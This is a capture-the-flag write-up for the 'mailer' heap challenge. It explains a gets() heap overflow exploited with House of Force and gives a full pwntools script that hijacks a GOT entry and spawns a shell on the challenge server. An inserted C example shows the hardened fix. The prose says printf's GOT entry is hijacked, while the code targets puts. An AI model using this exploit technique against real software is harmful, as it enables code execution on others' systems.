
mailer

D4rk3r
2018.09.21 12:24
Protections

The binary has an RWX segment and NX is disabled, so the exploit will probably need shellcode.

dump_mail
write_mail

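The program is simple and has only two features. The vulnerability is in write_mail: its two gets() calls cause a heap overflow, which gives control over the top chunk's size field. The size of each heap allocation can also be chosen freely, so House of Force can be used.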
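The two conditions described above, an unbounded gets() into a heap buffer and an unchecked allocation length, removed in a hardened mail-creation routine. This is an added example, not code from the original post or from the challenge binary; the struct layout, CONTENT_MAX, read_line, new_mail and demo are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TITLE_MAX   64     /* title size implied by the write-up's padding */
#define CONTENT_MAX 4096   /* assumed policy limit, not from the challenge */

struct mail {              /* hypothetical layout, not the binary's real struct */
    char   title[TITLE_MAX];
    size_t length;         /* capacity of content[] */
    char   content[];
};

/* Bounded gets() replacement (cap >= 1): keeps at most cap-1 bytes, drops the
 * rest of the line, always NUL-terminates. Returns bytes kept, -1 at EOF. */
long read_line(FILE *in, char *buf, size_t cap)
{
    size_t n = 0;
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        if (n + 1 < cap) buf[n++] = (char)c;
    buf[n] = '\0';
    return (c == EOF && n == 0) ? -1 : (long)n;
}

/* Rejects sizes outside the policy before malloc sees them, then reads each
 * field with its real capacity. Returns NULL on bad size, EOF or OOM. */
struct mail *new_mail(FILE *in, long length)
{
    if (length < 1 || length > CONTENT_MAX) return NULL;
    struct mail *m = calloc(1, sizeof *m + (size_t)length);
    if (!m) return NULL;
    m->length = (size_t)length;
    if (read_line(in, m->title, sizeof m->title) < 0 ||
        read_line(in, m->content, m->length) < 0) {
        free(m);
        return NULL;
    }
    return m;
}

/* Constructed input: a 200-byte title and 300-byte content for a 50-byte mail. */
struct mail *demo(void)
{
    static char input[502];
    memset(input, 'A', 200);       input[200] = '\n';
    memset(input + 201, 'B', 300); input[501] = '\n';
    FILE *in = fmemopen(input, sizeof input, "r");
    struct mail *m = in ? new_mail(in, 50) : NULL;
    if (in) fclose(in);
    return m;
}
```

With both reads bounded, the over-long title cannot reach the length field or the next chunk's header, and the size check removes the arbitrary allocation request.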

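Exploitation steps:

1. Add a mail, use the overflow to modify the size, and put the shellcode in the content.
2. Add another mail and use the overflow to modify the top chunk.
3. Leak the heap address of the first mail through the dump_mail function, and from it compute the offset by which the top chunk must be raised as well as the shellcode address.
4. Use House of Force to change the printf_got address to the shellcode address and get a shell.

Full exploit: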

from pwn import *
context.log_level = 'debug'
context(arch = 'i386')
#p = process('./mailer')
p = remote('hackme.inndy.tw',7721)
elf = ELF('./mailer')

def write(length,title,content):
    p.sendlineafter('Action: ','1')
    p.sendlineafter('Length: ',str(length))
    p.sendlineafter('Title: ',title)
    p.sendlineafter('Content: ',content)

def dump():
    p.sendlineafter('Action: ','2')


#leak heap_addr
shellcode = asm(shellcraft.sh())
write(50,'aa' + '\x00'*62 + p32(60),shellcode)
write(10,'bb','bb' + '\x00'*10 + p32(0xffffffff))
dump()
p.recvuntil('\x59\x00\x00\x00')
heap_addr = u32(p.recv(4))
log.success('heap addr : 0x%x'%heap_addr)
#gdb.attach(p,'b *'+str(0x080486B9))


topchunk_offset = 0xd0
topchunk_addr = heap_addr + topchunk_offset
#SIZE_SZ = 4
malloc_size = (elf.got['puts'] - 0x8 - 0x4 - 0x28) - topchunk_addr - 4
shellcode_addr = heap_addr + 72
#print hex(shellcode_addr)
write(malloc_size-72,'cc','cc')


#hijack printf_got --> shellcode_addr
p.sendlineafter('Action: ','1')
p.sendlineafter('Length: ','30')
p.sendlineafter('Title: ',p32(shellcode_addr)*10)


p.interactive()